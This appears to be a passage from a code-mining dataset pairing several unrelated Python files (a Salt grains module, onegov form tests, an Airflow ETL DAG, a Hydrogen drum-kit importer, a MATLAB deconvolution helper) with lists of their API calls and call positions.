        unique = {name.split('_')[0] + '_' + name.split('_')[1] for name in files}
    return list(unique)
| [
"matplotlib.pyplot.imshow",
"numpy.ceil",
"numpy.argmax",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.show"
] | [((640, 664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'size'}), '(figsize=size)\n', (650, 664), True, 'import matplotlib.pyplot as plt\n'), ((1464, 1505), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {'rect': '[0, 0.03, 1, 0.95]'}), '(rect=[0, 0.03, 1, 0.95])\n', (1480, 1505), True, 'import matplotlib.pyplot as plt\n'), ((1510, 1520), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1518, 1520), True, 'import matplotlib.pyplot as plt\n'), ((1439, 1458), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['title'], {}), '(title)\n', (1451, 1458), True, 'import matplotlib.pyplot as plt\n'), ((1388, 1403), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (1396, 1403), True, 'import matplotlib.pyplot as plt\n'), ((1065, 1092), 'numpy.argmax', 'np.argmax', (['label_array[idx]'], {}), '(label_array[idx])\n', (1074, 1092), True, 'import numpy as np\n'), ((1123, 1146), 'numpy.ceil', 'np.ceil', (['(batch_size / 4)'], {}), '(batch_size / 4)\n', (1130, 1146), True, 'import numpy as np\n'), ((1200, 1234), 'matplotlib.pyplot.imshow', 'plt.imshow', (['(image_array[idx] * 255)'], {}), '(image_array[idx] * 255)\n', (1210, 1234), True, 'import matplotlib.pyplot as plt\n'), ((1269, 1297), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image_array[idx]'], {}), '(image_array[idx])\n', (1279, 1297), True, 'import matplotlib.pyplot as plt\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Makina custom grains
=====================
makina.upstart
true if using upstart
makina.lxc
true if inside an lxc container
makina.docker
true if inside a docker container
makina.devhost_num
devhost num if any
'''
import os
import copy
import subprocess
# Module-level memoisation store shared by the grain helper functions.
_cache = {}
def init_environ(_o=None):
    """Return (and cache) the environment block of PID 1.

    Falls back to an empty string when /proc/1/environ is unreadable.
    """
    cache_key = 'init_environ'
    if cache_key not in _cache:
        try:
            with open('/proc/1/environ') as fobj:
                content = fobj.read()
        except (IOError, OSError):
            content = ''
        _cache[cache_key] = content
    return _cache[cache_key]
def _is_travis(_o=None):
is_nodetype = None
val = "{0}".format(os.environ.get('TRAVIS', 'false')).lower()
if val in ['y', 't', 'o', 'true', '1']:
is_nodetype = True
elif val:
is_nodetype = False
return is_nodetype
def _is_docker(_o=None):
    """
    Return true if we find a system or grain flag
    that explicitly shows us we are in a DOCKER context
    """
    if _o is None:
        try:
            _o = __opts__
        except NameError:
            _o = {}
    # an explicit grain wins over any heuristic
    try:
        in_docker = bool(__grains__.get('makina.docker'))
    except (ValueError, NameError, IndexError):
        in_docker = False
    # fall back to PID 1's environment, then to marker files
    if not in_docker:
        in_docker = 'docker' in init_environ()
    if not in_docker:
        in_docker = any(
            os.path.exists(marker)
            for marker in ('.dockerinit', '/.dockerinit'))
    return in_docker
def _is_lxc(_o=None):
    """
    Return true if we find a system or grain flag
    that explicitly shows us we are in a LXC context.

    In case of a container, we have the container name in cgroups,
    else it is equal to /
    in lxc:
        ['11:name=systemd:/user/1000.user/1.session',
         '10:hugetlb:/thisname',
         '9:perf_event:/thisname',
         '8:blkio:/thisname',
         '7:freezer:/thisname',
         '6:devices:/thisname',
         '5:memory:/thisname',
         '4:cpuacct:/thisname',
         '3:cpu:/thisname',
         '2:cpuset:/thisname']
    in host:
        ['11:name=systemd:/',
         '10:hugetlb:/',
         '9:perf_event:/',
         '8:blkio:/',
         '7:freezer:/',
         '6:devices:/',
         '5:memory:/',
         '4:cpuacct:/',
         '3:cpu:/',
         '2:cpuset:/']
    """
    if _o is None:
        try:
            _o = __opts__
        except NameError:
            _o = {}
    lxc = None
    # a docker container is never reported as LXC
    if _is_docker(_o=_o):
        lxc = False
    if lxc is None:
        # an explicit grain wins over any heuristic
        try:
            lxc = __grains__.get('makina.lxc', None)
        except (ValueError, NameError, IndexError):
            pass
    if lxc is None:
        try:
            # inside a container the cpu/cpuset cgroup path of PID 1 is
            # the container name; on the host it is '/' (see docstring)
            cgroups = open('/proc/1/cgroup').read().splitlines()
            lxc = not '/' == [a.split(':')[-1]
                              for a in cgroups
                              if ':cpu:' in a or
                              ':cpuset:' in a][-1]
        except Exception:
            lxc = False
    if not lxc:
        try:
            # LXC also advertises itself in PID 1's environment
            content = open('/proc/1/environ').read()
            lxc = 'container=lxc' in content
        except Exception:
            lxc = False
    return lxc and not _is_docker(_o=_o)
def _is_container(_o=None):
    """Return True when running inside any container (Docker or LXC).

    Consistency fix: forward ``_o`` to ``_is_docker`` like every other
    caller in this module does (``_is_docker`` previously received no
    options here).
    """
    return _is_docker(_o=_o) or _is_lxc(_o=_o)
def _devhost_num(_o=None):
return ''
# devhost will be removed from makina-states sooner or later
# if os.path.exists('/root/vagrant/provision_settings.sh'):
# num = subprocess.Popen(
# 'bash -c "'
# '. /root/vagrant/provision_settings.sh;'
# 'echo \$DEVHOST_NUM"',
# shell=True, stdout=subprocess.PIPE
# ).stdout.read().strip()
# if not num:
# num = '0'
# return num
def _routes(_o=None):
    '''Parse ``netstat -nr`` output into routing information.

    Returns a 3-tuple ``(routes, default_route, default_gateway)`` where
    ``routes`` is a list of dicts (one per routing table entry),
    ``default_route`` is the entry whose destination is 0.0.0.0 (empty
    dict when absent) and ``default_gateway`` is its gateway, or None.
    '''
    routes, default_route = [], {}
    troutes = subprocess.Popen(
        'bash -c "netstat -nr"',
        shell=True, stdout=subprocess.PIPE
    ).stdout.read().strip()
    # NOTE(review): on Python 3 Popen yields bytes here, so the string
    # comparisons below raise and every line is skipped — TODO confirm
    # whether this module only targets Python 2 or needs a decode().
    # skip the first header line; a second header line is filtered below
    for route in troutes.splitlines()[1:]:
        try:
            parts = route.split()
            # second header line starts with "Destination"
            if 'dest' in parts[0].lower():
                continue
            # map the positional netstat columns to named fields
            droute = {'iface': parts[-1],
                      'gateway': parts[1],
                      'genmask': parts[2],
                      'flags': parts[3],
                      'mss': parts[4],
                      'window': parts[5],
                      'irtt': parts[6]}
            if parts[0] == '0.0.0.0':
                default_route = copy.deepcopy(droute)
            routes.append(droute)
        except Exception:
            # ignore malformed or unexpected lines
            continue
    return routes, default_route, default_route.get('gateway', None)
def _is_vm(_o=None):
    """A host counts as a VM when it runs inside any container."""
    return bool(_is_container(_o=_o))
def _is_devhost(_o=None):
    """True when a devhost number is configured for this host."""
    num = _devhost_num(_o=_o)
    return num != ''
def _get_msconf(param, _o=None):
if _o is None:
_o = __opts__
cfgdir = os.path.abspath(_o.get('config_dir', '/etc/salt'))
nds = [os.path.join(cfgdir, 'makina-states'),
os.path.join(os.path.dirname(cfgdir), 'makina-states')]
for nd in nds:
try:
with open(os.path.join(nd, param)) as fic:
content = fic.read().strip()
if content:
break
except (OSError, IOError):
content = ''
return content
def _nodetype(_o=None):
    """Return the configured makina-states node type string."""
    value = _get_msconf('nodetype', _o=_o)
    return value
def _is_vagrantvm(_o=None):
    """True when this node is configured as a Vagrant VM."""
    return _nodetype(_o=_o) == 'vagrantvm'
def _is_kvm(_o=None):
    """True when this node is configured as a KVM guest."""
    return _nodetype(_o=_o) == 'kvm'
def _is_server(_o=None):
    """True when this node is configured as a bare server."""
    return _nodetype(_o=_o) == 'server'
def _is_laptop(_o=None):
    """True when this node is configured as a laptop."""
    return _nodetype(_o=_o) == 'laptop'
def _is_upstart(_o=None):
if os.path.exists('/var/log/upstart'):
return True
return False
def _is_systemd(_o=None):
try:
is_ = os.readlink('/proc/1/exe') == '/lib/systemd/systemd'
except (IOError, OSError):
is_ = False
rd = '/run/systemd'
try:
# ubuntu trusty has a light systemd running ...
if os.path.exists(rd) and len(os.listdir(rd)) > 4:
is_ = True
except (IOError, OSError):
is_ = False
return is_
def _pgsql_vers(_o=None):
vers = {'details': {}, 'global': {}}
for i in ['9.0', '9.1', '9.3', '9.4', '10.0', '10.1']:
pid = (
'/var/lib/postgresql/{0}'
'/main/postmaster.pid'.format(i))
dbase = (
'/var/lib/postgresql/{0}'
'/main/base'.format(i))
dglobal = (
'/var/lib/postgresql/{0}'
'/main/global'.format(i))
running = False
has_data = False
if os.path.exists(pid):
running = True
for d in [dbase, dglobal]:
if not os.path.exists(d):
continue
if os.listdir(d) > 2:
has_data = True
if running or has_data:
vers['global'][i] = True
vers['details'][i] = {'running': running,
'has_data': has_data}
return vers
def get_makina_grains(_o=None):
    '''Collect every makina.* grain exposed by this module.'''
    routes, default_route, gw = _routes(_o=_o)
    grains = {
        # init system
        'makina.upstart': _is_upstart(_o=_o),
        'makina.systemd': _is_systemd(_o=_o),
        # host classification
        'makina.nodetype': _nodetype(_o=_o),
        'makina.container': _is_container(_o=_o),
        'makina.server': _is_server(_o=_o),
        'makina.vm': _is_vm(_o=_o),
        'makina.laptop': _is_laptop(_o=_o),
        'makina.travis': _is_travis(_o=_o),
        'makina.lxc': _is_lxc(_o=_o),
        'makina.docker': _is_docker(_o=_o),
        'makina.kvm': _is_kvm(_o=_o),
        'makina.vagrantvm': _is_vagrantvm(_o=_o),
        # devhost support (legacy)
        'makina.devhost': _is_devhost(_o=_o),
        'makina.devhost_num': _devhost_num(_o=_o),
        # services & network
        'makina.pgsql_vers': _pgsql_vers(_o=_o),
        'makina.default_route': default_route,
        'makina.default_gw': gw,
        'makina.routes': routes,
    }
    return grains
# vim:set et sts=4 ts=4 tw=80:
| [
"os.path.exists",
"os.listdir",
"os.readlink",
"subprocess.Popen",
"os.path.join",
"os.environ.get",
"os.path.dirname",
"copy.deepcopy"
] | [((5692, 5726), 'os.path.exists', 'os.path.exists', (['"""/var/log/upstart"""'], {}), "('/var/log/upstart')\n", (5706, 5726), False, 'import os\n'), ((4942, 4979), 'os.path.join', 'os.path.join', (['cfgdir', '"""makina-states"""'], {}), "(cfgdir, 'makina-states')\n", (4954, 4979), False, 'import os\n'), ((6633, 6652), 'os.path.exists', 'os.path.exists', (['pid'], {}), '(pid)\n', (6647, 6652), False, 'import os\n'), ((1432, 1449), 'os.path.exists', 'os.path.exists', (['i'], {}), '(i)\n', (1446, 1449), False, 'import os\n'), ((5005, 5028), 'os.path.dirname', 'os.path.dirname', (['cfgdir'], {}), '(cfgdir)\n', (5020, 5028), False, 'import os\n'), ((5816, 5842), 'os.readlink', 'os.readlink', (['"""/proc/1/exe"""'], {}), "('/proc/1/exe')\n", (5827, 5842), False, 'import os\n'), ((6020, 6038), 'os.path.exists', 'os.path.exists', (['rd'], {}), '(rd)\n', (6034, 6038), False, 'import os\n'), ((709, 742), 'os.environ.get', 'os.environ.get', (['"""TRAVIS"""', '"""false"""'], {}), "('TRAVIS', 'false')\n", (723, 742), False, 'import os\n'), ((4452, 4473), 'copy.deepcopy', 'copy.deepcopy', (['droute'], {}), '(droute)\n', (4465, 4473), False, 'import copy\n'), ((6735, 6752), 'os.path.exists', 'os.path.exists', (['d'], {}), '(d)\n', (6749, 6752), False, 'import os\n'), ((6794, 6807), 'os.listdir', 'os.listdir', (['d'], {}), '(d)\n', (6804, 6807), False, 'import os\n'), ((5102, 5125), 'os.path.join', 'os.path.join', (['nd', 'param'], {}), '(nd, param)\n', (5114, 5125), False, 'import os\n'), ((6047, 6061), 'os.listdir', 'os.listdir', (['rd'], {}), '(rd)\n', (6057, 6061), False, 'import os\n'), ((3812, 3889), 'subprocess.Popen', 'subprocess.Popen', (['"""bash -c "netstat -nr\\""""'], {'shell': '(True)', 'stdout': 'subprocess.PIPE'}), '(\'bash -c "netstat -nr"\', shell=True, stdout=subprocess.PIPE)\n', (3828, 3889), False, 'import subprocess\n')] |
from cgi import FieldStorage
from datetime import date
from io import BytesIO
from onegov.core.utils import Bunch
from onegov.form import Form
from onegov.wtfs.fields import HintField
from onegov.wtfs.fields import MunicipalityDataUploadField
class PostData(dict):
    """Minimal multidict stand-in: ``getlist`` always yields a sequence."""

    def getlist(self, key):
        value = self[key]
        if isinstance(value, (list, tuple)):
            return value
        return [value]
def test_municipality_data_upload_field():
    form = Form()

    def make_field(content, **kwargs):
        # Bind a fresh upload field to the form and feed it a fake
        # cgi.FieldStorage wrapping the given CSV bytes.
        bound = MunicipalityDataUploadField(**kwargs).bind(form, 'upload')
        storage = FieldStorage()
        storage.file = BytesIO(content)
        storage.type = 'text/plain'
        storage.filename = 'test.csv'
        bound.process(PostData({'upload': storage}))
        return bound

    # Invalid
    field = make_field('Bäretswil;\r\n'.encode('cp1252'))
    assert not field.validate(form)
    messages = [error.interpolate() for error in field.errors]
    assert "Some rows contain invalid values: 0." in messages

    # Valid, no pick-up dates
    field = make_field('Bäretswil;111;-1;Normal;\r\n'.encode('cp1252'))
    assert field.validate(form)
    assert field.data == {111: {'dates': []}}

    # Valid, two pick-up dates
    field = make_field(
        'Bäretswil;111;-1;Normal;01.01.2019;07.01.2019\r\n'.encode('cp1252')
    )
    assert field.validate(form)
    assert field.data == {
        111: {'dates': [date(2019, 1, 1), date(2019, 1, 7)]}
    }
def test_hint_field(wtfs_app):
    """The hint field validates and renders the German hint text."""

    def get_translate(for_chameleon):
        # render with the Swiss-German translations
        return wtfs_app.chameleon_translations.get('de_CH')

    form = Form()
    field = HintField(macro='express_shipment_hint').bind(form, 'hint')
    field.meta.request = Bunch(app=wtfs_app, get_translate=get_translate)
    assert field.validate(form)
    assert "Für dringende Scan-Aufträge" in field()
| [
"cgi.FieldStorage",
"onegov.form.Form",
"onegov.wtfs.fields.MunicipalityDataUploadField",
"io.BytesIO",
"onegov.core.utils.Bunch",
"datetime.date",
"onegov.wtfs.fields.HintField"
] | [((455, 461), 'onegov.form.Form', 'Form', ([], {}), '()\n', (459, 461), False, 'from onegov.form import Form\n'), ((1610, 1616), 'onegov.form.Form', 'Form', ([], {}), '()\n', (1614, 1616), False, 'from onegov.form import Form\n'), ((1629, 1669), 'onegov.wtfs.fields.HintField', 'HintField', ([], {'macro': '"""express_shipment_hint"""'}), "(macro='express_shipment_hint')\n", (1638, 1669), False, 'from onegov.wtfs.fields import HintField\n'), ((1732, 1780), 'onegov.core.utils.Bunch', 'Bunch', ([], {'app': 'wtfs_app', 'get_translate': 'get_translate'}), '(app=wtfs_app, get_translate=get_translate)\n', (1737, 1780), False, 'from onegov.core.utils import Bunch\n'), ((515, 552), 'onegov.wtfs.fields.MunicipalityDataUploadField', 'MunicipalityDataUploadField', ([], {}), '(**kwargs)\n', (542, 552), False, 'from onegov.wtfs.fields import MunicipalityDataUploadField\n'), ((621, 635), 'cgi.FieldStorage', 'FieldStorage', ([], {}), '()\n', (633, 635), False, 'from cgi import FieldStorage\n'), ((665, 681), 'io.BytesIO', 'BytesIO', (['content'], {}), '(content)\n', (672, 681), False, 'from io import BytesIO\n'), ((1424, 1440), 'datetime.date', 'date', (['(2019)', '(1)', '(1)'], {}), '(2019, 1, 1)\n', (1428, 1440), False, 'from datetime import date\n'), ((1442, 1458), 'datetime.date', 'date', (['(2019)', '(1)', '(7)'], {}), '(2019, 1, 7)\n', (1446, 1458), False, 'from datetime import date\n')] |
from airflow import DAG
from airflow.utils.dates import days_ago
from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator
dag_kwargs = dict(
default_args={
'owner': 'airflow',
},
schedule_interval='@weekly',
catchup=False,
start_date=days_ago(2),
)
with DAG('cbs', **dag_kwargs,
description='by default imports emails and processes data for (current year - 1). '
'For back-fill do a manual run with following example json: '
'{"load_start_year": 2019}') as cbs_dag:
CliBashOperator(
'anyway-etl cbs import-emails',
skip_if=lambda context: context['dag_run'].conf.get('load_start_year'),
task_id='import-emails'
) >> CliBashOperator(
'anyway-etl cbs process-files',
skip_if=lambda context: context['dag_run'].conf.get('load_start_year'),
task_id='process-files'
) >> [
# for local development you can use the following command to parse all types sequentially:
# anyway-etl cbs parse-all
CliBashOperator(
'anyway-etl cbs parse-accidents'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-accidents'
),
CliBashOperator(
'anyway-etl cbs parse-involved'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-involved'
),
CliBashOperator(
'anyway-etl cbs parse-vehicles'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='parse-vehicles'
),
] >> CliBashOperator(
'anyway-etl cbs import-to-datastore'
'{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}',
task_id='import-to-datastore'
) >> CliBashOperator(
'anyway-etl cbs check-data-in-datastore',
task_id='check-data-in-datastore'
)
| [
"airflow.utils.dates.days_ago",
"anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator",
"airflow.DAG"
] | [((305, 508), 'airflow.DAG', 'DAG', (['"""cbs"""'], {'description': '"""by default imports emails and processes data for (current year - 1). For back-fill do a manual run with following example json: {"load_start_year": 2019}"""'}), '(\'cbs\', **dag_kwargs, description=\n \'by default imports emails and processes data for (current year - 1). For back-fill do a manual run with following example json: {"load_start_year": 2019}\'\n )\n', (308, 508), False, 'from airflow import DAG\n'), ((283, 294), 'airflow.utils.dates.days_ago', 'days_ago', (['(2)'], {}), '(2)\n', (291, 294), False, 'from airflow.utils.dates import days_ago\n'), ((2041, 2138), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs check-data-in-datastore"""'], {'task_id': '"""check-data-in-datastore"""'}), "('anyway-etl cbs check-data-in-datastore', task_id=\n 'check-data-in-datastore')\n", (2056, 2138), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1809, 2014), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs import-to-datastore{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""import-to-datastore"""'}), '(\n \'anyway-etl cbs import-to-datastore{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'import-to-datastore\')\n', (1824, 2014), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1074, 1271), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-accidents{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-accidents"""'}), '(\n \'anyway-etl cbs parse-accidents{% if dag_run.conf.get("load_start_year") %} 
--load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-accidents\')\n', (1089, 1271), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1320, 1515), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-involved{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-involved"""'}), '(\n \'anyway-etl cbs parse-involved{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-involved\')\n', (1335, 1515), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n'), ((1564, 1759), 'anyway_etl_airflow.operators.cli_bash_operator.CliBashOperator', 'CliBashOperator', (['"""anyway-etl cbs parse-vehicles{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}"""'], {'task_id': '"""parse-vehicles"""'}), '(\n \'anyway-etl cbs parse-vehicles{% if dag_run.conf.get("load_start_year") %} --load-start-year {{ dag_run.conf["load_start_year"] }}{% endif %}\'\n , task_id=\'parse-vehicles\')\n', (1579, 1759), False, 'from anyway_etl_airflow.operators.cli_bash_operator import CliBashOperator\n')] |
import cc_dat_utils
#Part 1
input_dat_file = "data/pfgd_test.dat"
#Use cc_dat_utils.make_cc_level_pack_from_dat() to load the file specified by input_dat_file
#print the resulting data
data = cc_dat_utils.make_cc_level_pack_from_dat(input_dat_file)
print(data) | [
"cc_dat_utils.make_cc_level_pack_from_dat"
] | [((195, 251), 'cc_dat_utils.make_cc_level_pack_from_dat', 'cc_dat_utils.make_cc_level_pack_from_dat', (['input_dat_file'], {}), '(input_dat_file)\n', (235, 251), False, 'import cc_dat_utils\n')] |
'''
Created on Jun 14, 2020
@author: peter
'''
import sys
import re
import tarfile
from os import path
import xml.etree.ElementTree as ET
import logging
from gen_drum_kit.importer.importer_base import ImporterBase
from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen
from gen_drum_kit.util import dir_exists
logger = logging.getLogger(__name__)
class ImporterHydrogen(ImporterBase):
""" importer that reads in a Hydrogen drum kit DB """
def __init__(self, params):
super().__init__(params)
logger.debug("Running in debug mode ...")
logger.debug("ImporterBase '%s' created.", __name__)
self._xml = None # assigned later
def importData(self):
self._prepare()
# Load drumkit info from XML file and create a drumkit object
logger.info("Loading Hydrogen XML file '%s'...", self._params.HG_xml)
self._xml = self._read_xml(self._params.HG_xml)
self._debug_print() # only in debug mode
self._read_map_file()
# private functions ----------------------
def _createBuilder(self):
# create and return the builder
logger.info("Creating drum kit from Hydrogen data.")
return(Builder_Hydrogen(params=self._params, xml=self._xml, mapDB=self._channel_map))
def _read_xml(self, HG_xml):
try:
tree = ET.parse(HG_xml)
except:
logger.error("Error reading XML from '%s'! Aborting ...", HG_xml)
sys.exit(2)
logger.info("XML file '%s' successfully read", HG_xml)
self._xml_remove_namespace(tree)
return(tree)
@staticmethod
def _xml_remove_namespace(tree):
root = tree.getroot()
namespaces = re.findall(r"{.*}", root.tag)
try:
namespace = namespaces[0]
logger.debug(namespace)
except:
return() # nothing to be done
nsl = len(namespace)
for elem in root.getiterator():
if elem.tag.startswith(namespace):
elem.tag = elem.tag[nsl:]
return()
def _debug_print(self):
#ET.dump(self._xml)
root = self._xml.getroot()
logger.debug("XML Root is: '%s'", root)
for n1 in root:
logger.debug("\t%s - %s", n1.tag, n1.text)
for n2 in n1:
logger.debug("\t\t%s - %s", n2.tag, n2.text)
for n3 in n2:
logger.debug("\t\t\t%s - %s", n3.tag, n3.text)
for n4 in n3:
logger.debug("\t\t\t\t%s - %s", n4.tag, n4.text)
for n5 in n4:
logger.debug("\t\t\t\t\t%s - %s", n5.tag, n5.text)
def _prepare(self):
if self._params.HG_db:
self._extract_HG_db()
def _extract_HG_db(self):
if not path.exists(self._params.HG_db):
logger.warning("Hydrogen DB '%s' does not exists. Aborting ...", self._params.HG_db )
logger.info("Try on unpacked kit (Hydrogen XML)!")
sys.exit(1)
# if kit name is not set use base name of HG DB file
if not self._params.drumkit_name:
self._params.drumkit_name = path.basename(self._params.HG_db).replace(".h2drumkit", "")
self._params.src_dir = self._params.tmp_dir + "/" + self._params.drumkit_name
self._params.HG_xml = self._params.src_dir + "/drumkit.xml"
# unpack hydrogen file
logger.info("Unpacking Hydrogen data file '%s' to '%s' ...", self._params.HG_db,
self._params.tmp_dir)
try: # open archive, could be gzipped tar or plain tar
logger.debug("Assume it it is gzip'ed tar archive ...")
tar = tarfile.open(self._params.HG_db, "r:gz")
except:
logger.debug("Failed: Assume it is old style tar'ed archive ...")
try:
tar = tarfile.open(self._params.HG_db, "r")
except:
logger.error("Failed to open Hydrogen data file. Aborting ...")
sys.exit(1)
try: # extract
logger.debug("Extracting ...")
tar.extractall(self._params.tmp_dir)
tar.close()
except:
logger.error("Failed to unpack Hydrogen data file. Aborting ...")
sys.exit(1)
# check if name from Hydrogen DB file matches unpacked directory name
if not dir_exists(self._params.src_dir):
logger.error("Name of drum kit '%s' seems to be incorrect! " +
"Please check the unpacked data in directory '%s'. Aborting ..." ,
self._params.drumkit_name, self._params.tmp_dir)
sys.exit(1)
self._params.clean_rm.append(self._params.src_dir)
| [
"logging.getLogger",
"os.path.exists",
"tarfile.open",
"xml.etree.ElementTree.parse",
"gen_drum_kit.builder.builder_hydrogen.Builder_Hydrogen",
"gen_drum_kit.util.dir_exists",
"os.path.basename",
"sys.exit",
"re.findall"
] | [((359, 386), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (376, 386), False, 'import logging\n'), ((1233, 1310), 'gen_drum_kit.builder.builder_hydrogen.Builder_Hydrogen', 'Builder_Hydrogen', ([], {'params': 'self._params', 'xml': 'self._xml', 'mapDB': 'self._channel_map'}), '(params=self._params, xml=self._xml, mapDB=self._channel_map)\n', (1249, 1310), False, 'from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen\n'), ((1747, 1775), 're.findall', 're.findall', (['"""{.*}"""', 'root.tag'], {}), "('{.*}', root.tag)\n", (1757, 1775), False, 'import re\n'), ((1378, 1394), 'xml.etree.ElementTree.parse', 'ET.parse', (['HG_xml'], {}), '(HG_xml)\n', (1386, 1394), True, 'import xml.etree.ElementTree as ET\n'), ((2863, 2894), 'os.path.exists', 'path.exists', (['self._params.HG_db'], {}), '(self._params.HG_db)\n', (2874, 2894), False, 'from os import path\n'), ((3069, 3080), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3077, 3080), False, 'import sys\n'), ((3756, 3796), 'tarfile.open', 'tarfile.open', (['self._params.HG_db', '"""r:gz"""'], {}), "(self._params.HG_db, 'r:gz')\n", (3768, 3796), False, 'import tarfile\n'), ((4450, 4482), 'gen_drum_kit.util.dir_exists', 'dir_exists', (['self._params.src_dir'], {}), '(self._params.src_dir)\n', (4460, 4482), False, 'from gen_drum_kit.util import dir_exists\n'), ((4737, 4748), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4745, 4748), False, 'import sys\n'), ((1501, 1512), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1509, 1512), False, 'import sys\n'), ((4344, 4355), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4352, 4355), False, 'import sys\n'), ((3225, 3258), 'os.path.basename', 'path.basename', (['self._params.HG_db'], {}), '(self._params.HG_db)\n', (3238, 3258), False, 'from os import path\n'), ((3930, 3967), 'tarfile.open', 'tarfile.open', (['self._params.HG_db', '"""r"""'], {}), "(self._params.HG_db, 'r')\n", (3942, 3967), False, 'import tarfile\n'), ((4084, 
4095), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4092, 4095), False, 'import sys\n')] |
import matlab.engine
import matlab
import numpy as np
import PIL
import matplotlib.pyplot as plt
import sys
print(sys.version_info[0:2])
if sys.version_info[0:2] != (3, 8) and sys.version_info[0:2] != (3, 7) and sys.version_info[0:2] != (3, 6):
raise Exception('Requires python 3.6, 3.7, or 3.8')
eng = matlab.engine.start_matlab()
def blind_deconvolution(image, kernel_size=3, num_iterations=30, weighted=False, edge_weight=.08):
# If URL to image
if type(image) == type(str()):
image = PIL.Image.open(image)
image = PIL.ImageOps.grayscale(image)
# If PIL image object
elif type(image) == PIL.Image:
image = np.asarray(image)
image = PIL.ImageOps.grayscale(image)
# If its already in numpy array
elif type(image) == np.ndarray:
image = PIL.Image.fromarray(image)
image = PIL.ImageOps.grayscale(image)
# Else raise exception
else:
raise Exception('Input was of type ' + str(type(image)) + '. Must be a URL to an image, a PIL Image object, or an np array')
# If weighted
if weighted:
weight = eng.edge(image,"sobel",edge_weight)
se = eng.strel("disk",2)
weight = 1-matlab.double(eng.imdilate(weight,se))
# Starting kernel
start_kernel_np = np.ones((kernel_size,kernel_size))
start_kernel = []
image_np = np.asarray(image)
image = []
# Convert to matlab types
for i in range(len(start_kernel_np)):
start_kernel.append(matlab.double(start_kernel_np[i].tolist()))
start_kernel = matlab.double(start_kernel)
for i in range(len(image_np)):
image.append(matlab.double(image_np[i].tolist()))
image = matlab.double(image)
# Call Matlab Blind deconvolution
if weighted:
deconvolved = eng.deconvblind(image, start_kernel, num_iterations, weight)
else:
deconvolved = eng.deconvblind(image, start_kernel)
deconvolved = np.asarray(deconvolved).squeeze()
return deconvolved | [
"PIL.Image.fromarray",
"PIL.Image.open",
"matlab.engine.start_matlab",
"numpy.ones",
"numpy.asarray",
"PIL.ImageOps.grayscale",
"matlab.double"
] | [((310, 338), 'matlab.engine.start_matlab', 'matlab.engine.start_matlab', ([], {}), '()\n', (336, 338), False, 'import matlab\n'), ((1282, 1317), 'numpy.ones', 'np.ones', (['(kernel_size, kernel_size)'], {}), '((kernel_size, kernel_size))\n', (1289, 1317), True, 'import numpy as np\n'), ((1354, 1371), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1364, 1371), True, 'import numpy as np\n'), ((1554, 1581), 'matlab.double', 'matlab.double', (['start_kernel'], {}), '(start_kernel)\n', (1567, 1581), False, 'import matlab\n'), ((1697, 1717), 'matlab.double', 'matlab.double', (['image'], {}), '(image)\n', (1710, 1717), False, 'import matlab\n'), ((512, 533), 'PIL.Image.open', 'PIL.Image.open', (['image'], {}), '(image)\n', (526, 533), False, 'import PIL\n'), ((550, 579), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), '(image)\n', (572, 579), False, 'import PIL\n'), ((657, 674), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (667, 674), True, 'import numpy as np\n'), ((691, 720), 'PIL.ImageOps.grayscale', 'PIL.ImageOps.grayscale', (['image'], {}), 